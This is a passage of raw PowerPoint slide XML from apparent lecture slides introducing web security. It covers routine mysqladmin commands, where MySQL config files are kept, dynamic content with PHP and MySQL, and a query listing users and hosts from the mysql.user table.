              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql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dirty="0"/>
              <a:t>Command-line database administration utility: </a:t>
            </a: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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysqladmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  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400050" lvl="1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-u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>: database root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1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-p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>prompt for password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>To check server is running: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysqladmin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-u root -p ping </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>To check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>version: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysqladmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -u root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>–p version 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dirty="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>change password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysqladmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -u root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>–p password xyz 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dirty="0"/>
              <a:t>To check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>status: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysqladmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -u root –p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>status </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>shutdown: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysqladmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -u root –p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>shutdown</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>start: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$ /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysqld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>safe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>--user=root &amp; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> files are inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, with most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>information in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>my.cnf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</a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="20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43055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Comic Sans MS" charset="0"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr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Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> addresses the issues that are specific </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>how </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>web servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> present their </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>browsers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>how </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>the browsers interact with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>how </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>people interact with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>From </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> contents to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dynamic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/>
              <a:t>contents from web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Static – related to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>access control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> of disk files</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Dynamic – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0"/>
              <a:t>e.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>, alter advertisements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>depending on what </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>can be guessed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>geographical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>location and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>personal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>preferences of the visitor </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Dynamic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>content creation frequently requires that the web server be connected to a database server </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>that is dished out dynamically is placed in the database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>eed mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>/tool that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>can analyze the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>received </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>from a visitor’s browser and any other available </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>on the visitor, decide what to fetch from the database for the request at hand, and then compose a web page to be sent back to the visitor </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>That mechanism/tool is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ASP for Microsoft)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>specially for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>open-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>source Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>web server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>backend </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRP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eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS" charset="0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Installation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sz="2000" dirty="0" smtClean="0"/>
              <a:t>Set up account: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Setting up a new account means entering information in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0"/>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" u="sng" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0"/>
              <a:t>database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> that comes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>preinstalled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> with the database system </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Fire up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> shell: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a: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 -u root -p </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>rint </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>contents </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>of all the rows, but only the columns Host and User, from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>of </a:t>
            </a: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dirty="0"/>
              <a:t> database </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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select User, Host from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql.user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>; 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400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>+------------------+------------+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>| User             | Host       |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>+------------------+------------+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
